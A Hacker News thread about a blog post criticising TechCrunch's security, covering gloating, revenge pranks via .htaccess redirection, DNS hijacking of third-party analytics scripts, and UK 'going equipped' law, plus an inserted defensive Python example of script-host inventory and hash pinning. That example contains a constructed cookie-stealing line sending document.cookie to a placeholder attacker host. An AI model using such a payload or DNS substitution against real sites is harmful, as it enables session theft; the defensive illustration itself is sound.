TechCrunch: Skating on Thin Ice - jgrahamc
http://www.jgc.org/blog/2009/07/techcrunch-skating-on-thin-ice.html

======
tdavis
I never, ever gloat or make fun of others when it comes to security. It seems
like a no-win situation. If you go to someone privately with security
concerns, you're generally seen as helpful. If I publicly out somebody, there
are all sorts of people like the author (but far less scrupulous) who might
consider it their duty to knock me down a peg... and I'm no security expert.

Using "password" for a password is really stupid, but "really stupid" is
relative to the knowledge level of the person pointing it out, in most cases.
I'd prefer not to find out what really stupid thing I've done to allow some
script kiddie access to my servers (or whatever the case may be).

~~~
davidw
I actually don't care much for the tone of this article either, for that
matter. It's just a bit off for some reason IMO. Perhaps it comes across as a
bit of gloating itself? I'm not sure, but it's not that big a deal.

~~~
J_McQuade
The tone reminds me exactly of the bit in The Hitchhiker's Guide to the Galaxy
where Slartibartfast calls Arthur Dent "late" in an effete attempt to sound
sinister and threatening...

... but that's probably just me, though.

~~~
jacquesm
'threats... I'm not very good at them, though I'm told they can be quite
effective...'.

------
jgrahamc
A quick follow up. TechCrunch got in contact and we had a quick back and
forth. They confirmed that the security vulnerability I was pointing out was
something they had worried about already and taken action to mitigate.

They also said "We have had thousands of breakin attempts over the past few
days". No surprise really.

And they are planning some posts pointing out the vulnerable nature of apps in
the cloud.

------
IgorCarron
Aren't the situations a little asymmetrical, or are they? How much does a
disruption in Twitter service affect people, and how much does a disruption in
Techcrunch affect the internet economy?

~~~
Retric
Are you suggesting they are both almost useless?

Edit: On second thought I assume you mean one of them is useful, but I could
not tell from your comment which you thought was more useful.

~~~
alex_c
I really think that puts things in perspective a bit.

------
sfphotoarts
I think that what TC are doing with the stolen documents is deplorable
journalism, but his site remains, and is currently unhacked, so I guess he has
the last laugh.

------
vaksel
I'm no "hacking expert" but is hacking nowadays really just you
guessing/stealing a person's password?

~~~
froo
Not all that's involved. Sometimes "hacking" involves creative pranks.

For example, one prank I pulled (which was admittedly pretty basic and silly)
was a creative redirection using .htaccess for a certain someone's fixed IP
address who used to lurk a site I ran last year. This person had an extreme
distaste for me, because of the existence of the site and she would publicly
slander me for something I never did at every available chance.

So I decided to have a little fun with her.

I set up a page with her (publicly available) photo with a large text headline
saying that she had been hacked, which the redirection went to.

Total time to setup - less than 3 minutes.

Having her write me a lengthy email telling me that she was going to call
the police (in Australia) and have me arrested was pretty interesting. I never
responded.

I think I would be freaked out too if the next time I visited someone's blog
(which I was hypothetically consistently leaving trolling/nasty comments on)
there would be my picture there, exclaiming how I'd been hacked.

Sometimes the illusion of having "hacked" someone is just as satisfying as the
real thing, without the messy potential of jail-time.

~~~
jacquesm
Remind me to stay on your good side.

We pulled a similar prank on a guy working on implementing 'verified by visa'.
Every morning he'd walk in to the office and read the same news site. So,
three days before completing the project we cloned the news site and posted an
article that VISA had decided to abandon VBV.

He walks in to the office, starts reading the headlines (-- expletive deleted
--) slams his coffee down and walks out of the office.

To his credit, within 20 paces he started laughing like mad, knowing he'd been
had. Pretty clever dude, it would have taken me a bit longer... :)

To protect the guilty and the innocent alike, no further references, but rest
assured that a few words were addressed to VISA execs that were not exactly
pc.

Lots of fun with the DNS.

~~~
jgrahamc
You could do a load of damage with DNS redirection. If you look at the market
penetration of Google Analytics you'll see that a very, very large number of
sites are embedding JavaScript pulled from google-analytics.com in web pages.
Now imagine if you redirected that one domain and served your own JavaScript.
You could include the GA JavaScript as well, but add your own stuff which
would then run in everyone's (within that DNS area) web pages and your
JavaScript could start doing all sorts of nasty things.

~~~
jacquesm
Absolutely, I don't think it will be long before there will be a major hack
like this at some large ISP. The temptation is just too large.

DNS is one of the weak links of the way the web is put together, and
javascript embedded from third party sites nicely exposes that Achilles heel.

Another reason to mistrust open wifi connections :)
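
The two comments above describe the exposure (one redirected domain, many
pages executing whatever it serves) without a worked check. The block below
is an added example and is not code from the thread or from any of the
people in it. It does two things: it inventories the hosts a page pulls
scripts from, i.e. the domains whose DNS resolution the page implicitly
trusts, and it shows how pinning a content hash in the page (Subresource
Integrity, a browser mechanism that postdates this thread and is used here
only for illustration) rejects a script served from a redirected domain even
when the redirected server returns the genuine script with a payload
appended so that nothing visibly breaks. The HTML, the "genuine" analytics
script and the appended payload are all constructed for the example; the
host names in them are placeholders.

```python
"""Added example (not from the thread): third-party script inventory plus
a content-hash check in the style of Subresource Integrity.  All HTML and
script bytes here are constructed; attacker.invalid is a placeholder."""
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: one first-party script, one analytics script pulled from
# a third-party host (the situation the comment describes), and one
# scheme-relative include to show that form is handled too.
SAMPLE_HTML = """
<html><head>
<script src="/js/site.js"></script>
<script src="http://www.google-analytics.com/ga.js"></script>
<script src="//cdn.example.net/lib.js"></script>
</head><body>hi</body></html>
"""


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def third_party_script_hosts(html, page_host):
    """Hosts other than page_host from which the page executes JavaScript.
    Each of these is a domain whose DNS answer the page trusts blindly."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    hosts = set()
    for src in parser.srcs:
        # urlparse gives a hostname for absolute and scheme-relative
        # ("//host/path") URLs; a relative path has none and is first-party.
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            hosts.add(host.lower())
    return hosts


def sri_integrity(script_bytes):
    """Integrity value in the form browsers use: sha384-<base64 digest>."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def verify_sri(script_bytes, integrity):
    """True only if script_bytes hash to the pinned value.  A script that
    arrives from a redirected host with any change at all fails here."""
    algo, _, expected = integrity.partition("-")
    if algo != "sha384":
        raise ValueError("unsupported digest algorithm: " + algo)
    actual = base64.b64encode(hashlib.sha384(script_bytes).digest()).decode("ascii")
    return hmac.compare_digest(actual, expected)


# Constructed scripts: the "genuine" analytics script, and what a server
# sitting behind a redirected analytics domain could return: the genuine
# script unchanged, with a cookie-stealing line appended after it.
GENUINE_GA = b"var _gaq=_gaq||[];_gaq.push(['_trackPageview']);"
PAYLOAD = b"new Image().src='http://attacker.invalid/?c='+document.cookie;"
HIJACKED_GA = GENUINE_GA + PAYLOAD


def demo():
    """Inventory the sample page and check both script variants against a
    pin computed from the genuine script."""
    pin = sri_integrity(GENUINE_GA)
    return {
        "hosts": third_party_script_hosts(SAMPLE_HTML, "www.example.com"),
        "genuine_ok": verify_sri(GENUINE_GA, pin),
        "hijacked_ok": verify_sri(HIJACKED_GA, pin),
    }


if __name__ == "__main__":
    print(demo())
```

The inventory is the part worth running against a real page: every host it
returns is a point where a poisoned resolver or a rogue access point on an
open wifi network can substitute code that runs with the page's own origin.
The hash check only helps if the pin is computed from a copy of the script
fetched over a path you trust, and it ties the page to one exact version of
the third-party script, so it trades the DNS exposure for a maintenance cost.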

------
chanux
I think he is hiding something in his article. Interesting.

~~~
jgrahamc
I'm not hiding anything. I'm just pointing out that this sort of gloating is a
really bad idea. If I had actually broken into TechCrunch's systems do you
think I would post an article about it?

~~~
Herring
Or maybe that's what you want us to think. After that last hack, you'd be
rather high on the suspect list.

~~~
mahmud
Get off the guy's back. That last hack was both clever and responsible. Having
the ability to find security problems does NOT make one a suspect
automatically.

~~~
jacquesm
Actually, in most companies that is exactly what it does.

~~~
jgrahamc
Agreed. I wonder at what point intelligence and knowledge become an arrestable
offense. I own a set of lock picks. If I were to carry these outside of my
home in the UK (since I am not a locksmith) I could be arrested for the
offense of "going equipped".

---

Section 25 Theft Act 1968

(1) A person shall be guilty of an offence if, when not at his place of abode,
he has with him any article for use in the course of or in connection with any
burglary, theft or cheat.

(3) Where a person is charged with an offence under this section, proof that
he had with him any article made or adapted for use in committing a burglary,
theft or cheat shall be evidence that he had it with him for such use.

---

Am I "going equipped" on a daily basis?

~~~
jacquesm
The joke goes that a locksmith was arrested for 'going equipped' and he
countered they should arrest him for rape as well...

------
TweedHeads
At least this post will have everybody running like headless chickens at TC
deleting every piece of unethical or compromising evidence and fixing every
possible security hole.

But there will always be one hole left...

~~~
jgrahamc
Or, Michael Arrington could just send me an email and I'll tell him which
machine I'm talking about.

~~~
scorpion032
Would you also let us know which machine it is if _someone else_ mails you?

~~~
TweedHeads
Hey it is me, Michael Arrington.

Please tell me which machine it is, send info to:

michaelarrington@mailinator.com

Thanks!

~~~
jgrahamc
You think I don't know Michael Arrington's email address, or how to verify
that it's really him?

~~~
biohacker42
I think the @mailinator was a tip off.

